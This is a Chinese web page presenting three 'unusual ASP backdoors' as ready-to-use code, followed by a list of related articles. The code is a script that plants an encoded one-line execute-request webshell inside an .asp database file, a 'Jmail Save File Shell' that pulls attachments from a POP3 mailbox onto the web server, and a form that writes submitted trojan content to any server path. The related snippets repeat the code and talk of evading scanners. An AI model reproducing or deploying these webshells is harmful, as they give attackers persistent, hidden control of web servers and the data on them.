几种另类的ASP后门

<% 

'code by netpatch

dim dbfile,sql 

db="netpatch.asp"

dbfile=server.MapPath(db)

set ydb=server.CreateObject("ADOX.Catalog") 

ydb.Create "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" & dbfile 

set ydb=nothing 

if err.number=0 then 

Response.Write dbfile & " 创建成功<br> " 

else 

Response.Write "创建失败,原因: " & err.description 

Response.End 

end if

Set Conn = Server.CreateObject("ADODB.Connection") 

Conn.Open "Provider=Microsoft.Jet.OLEDB.4.0; Data Source=" & dbfile

sql="CREATE TABLE fdata([data] Memo)" 

conn.execute(sql)

Set rs = CreateObject("ADODB.RecordSet") 

rs.Open "FData", conn, 1, 3 

rs.addnew 

rs("data")="┼攠數畣整爠煥敵瑳∨≮┩>"   '(注释记得去掉!一句话后门 execute request(“n”))

rs.update

%>

用Jmail写文件进硬盘

<% 

    'codz by kEvin1986 [S4T]

    User=Request.Form("User")

    Pass=Request.Form("Pass")

    Popserver=Request.Form("Popserver")

if User<>"" and Pass<>"" and Popserver<>"" then

        Set objmail = CreateObject( "JMail.POP3" )

        objmail.Connect User, Pass, Popserver

set objmsg=CreateObject("jmail.message")

        Set objmsg = objmail.Messages.item(1) 

        separator = ", "

        response.write "Attachment Name is: " & SaveAtta & "<br>"

        objmail.Disconnect

    End if

Function SaveAtta()

        Set Attachments = objmsg.Attachments

        separator = ", "

        response.write "The size of this Attachment is: " & objmsg.size & "<br>"

        For i = 0 To Attachments.Count - 1

        If i = Attachments.Count - 1 Then

              separator = ""

        End If

Set Theatta = Attachments(i)

        response.write Theatta.Name 

        Theatta.SaveToFile(Server.Mappath(".") & "\" & Theatta.Name)

        Response.write "Oh!Hey Guy.....That's OK!"

        Next

    End Function

%>

<Html>

<Head>

<Title>Jmail Save File Shell</Title>

</Head>

<Body>

<Center>

<Form Method="POST">

User: <input name="User" type=text value="kevin1986"><br>

Pass: <input name="Pass" type=text value="1986lovinghuan"><br>

POP3: <input name="Popserver" type=text value="pop.163.com"><br>

<input type=submit value="Get the Attachments Of the First Mail">

</Form>

</Center>

</Body>

</Html>

利用xml写马

<%on error resume next%>

<form id="form1" name="form1" method="post" action=''''>

<p>木马内容</p>

<p><textarea name="flashboy" cols="80" rows="10"></textarea></p>

<p>路径</p>  

<p><input name="textfield" type="text" size="50" /></p>

<p><input type="submit" name="Submit" value="提交" /></p></form>

<p><%Response.write "本文件绝对路径"%>

  <%=server.mappath(Request.ServerVariables("SCRIPT_NAME"))%></p>

<%

dim xmlString

dim xmlDoc

xmlString= Request("flashboy")

set xmlDoc = server.createObject("Msxml2.DOMDocument")

xmlDoc.loadXml(xmlString)

f=Request("textfield")

xmlDoc.save(f)

set xmlDoc=nothing

%>

时间: 2024-08-02 08:11:09

几种另类的ASP后门的相关文章

几种另类的ASP后门_木马相关

<%  'code by netpatch dim dbfile,sql  db="netpatch.asp" dbfile=server.MapPath(db)  set ydb=server.CreateObject("ADOX.Catalog")  ydb.Create "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" & dbfile  set ydb=nothing  if e

五种常见的ASP.NET安全缺陷

asp.net|安全 保证应用程序的安全应当从编写第一行代码的时候开始做起,原因很简单,随着应用规模的发展,修补安全漏洞所需的代价也随之快速增长.根据IBM的系统科学协会(Systems Sciences Institute)的研究,如果等到软件部署之后再来修补缺陷,其代价相当于开发期间检测和消除缺陷的15倍. 为了用最小的代价保障应用程序的安全,在代码本身的安全性.抗御攻击的能力等方面,开发者应当担负更多的责任.然而,要从开发的最初阶段保障程序的安全性,必须具有相应的技能和工具,而真正掌握这些

七步倒┈→专用asp后门_木马相关

<html> <head> <title>七步倒┈→专用asp后门</title> </head> </html> <%dim objFSO%> <%dim fdata%> <%dim objCountFile%> <%on error resume next%> <%Set objFSO = Server.CreateObject("Scripting.FileSyst

七步倒┈→专用asp后门

<html> <head> <title>七步倒┈→专用asp后门</title> </head> </html> <%dim objFSO%> <%dim fdata%> <%dim objCountFile%> <%on error resume next%> <%Set objFSO = Server.CreateObject("Scripting.FileSyst

新型ASP后门源代码分析_木马相关

本是为了逃LAKER2兄 查ASP木马程序的  现在已经挑战成功,已经加为检查对象了.公布出代码给冰点的朋友使使,希望大家喜欢!  利用的是ADOX.Catalog组件  复制代码 代码如下: <%    'code by netpatch   dim dbfile,sql    db="netpatch.asp"   dbfile=server.MapPath(db)    set ydb=server.CreateObject("ADOX.Catalog"

介绍县级地方社区几种另类的开拓用户方法

中介交易 http://www.aliyun.com/zixun/aggregation/6858.html">SEO诊断 淘宝客 云主机 技术大厅 地方网站的细分已经进入到县级甚至镇级的区域了,地区越小,可供开发的用户数量就会越小,能够给网站带来的利润就会越小,而且现在很多县级地方网站还不止一个,有地方门户,地方分类,地方人才,地方房产和装修等等,所以看起来很小的地方,同样存在着激烈的竞争,如何开拓更多的用户,就成了很多地方网站亟需要解决的问题. 地方网站开拓网站的用户量一般而言,会通过

新型ASP后门源代码分析

本是为了逃LAKER2兄 查ASP木马程序的  现在已经挑战成功,已经加为检查对象了.公布出代码给冰点的朋友使使,希望大家喜欢! 利用的是ADOX.Catalog组件 复制代码 代码如下:<%    'code by netpatch   dim dbfile,sql    db="netpatch.asp"   dbfile=server.MapPath(db) set ydb=server.CreateObject("ADOX.Catalog")    y

三种“另类”网站推广方法小谈总结

中介交易 http://www.aliyun.com/zixun/aggregation/6858.html">SEO诊断 淘宝客 云主机 技术大厅 现在这个互联网充实着各个角落的时代中,各类网络推广手法可谓是无奇不有,基本上我们能想到的都有人在做了,那么今天笔者就和大家一起来探讨下三种相对"另类"的网络营销方式,之所以说它另类是因为这并非是人人都能去做的,因为需要有一定的技术功底以及创新意识.不过在这样一个花样百出的9201.html">互联网世界中,

ASP后门之终极伪装

记得当年asp木马出来的时候号称"永不被杀的木马",呵呵,时至今日,随便什么杀毒软件都能将其杀得片甲不留^_^呵呵,受到木马换壳躲避杀毒软件思路影响,我们也可以给asp木马"加壳"(呵呵,当然不是用UPX等).还等什么?请往下看. 其实这个思路很简单,就是把asp代码编码,执行时再解码.这里有两个方法,一是用微软的工具Script Encoder:二是利用asp的execute函数. 先说说Script Encoder.这个东东可以在微软官方网站免费下到,而且还附赠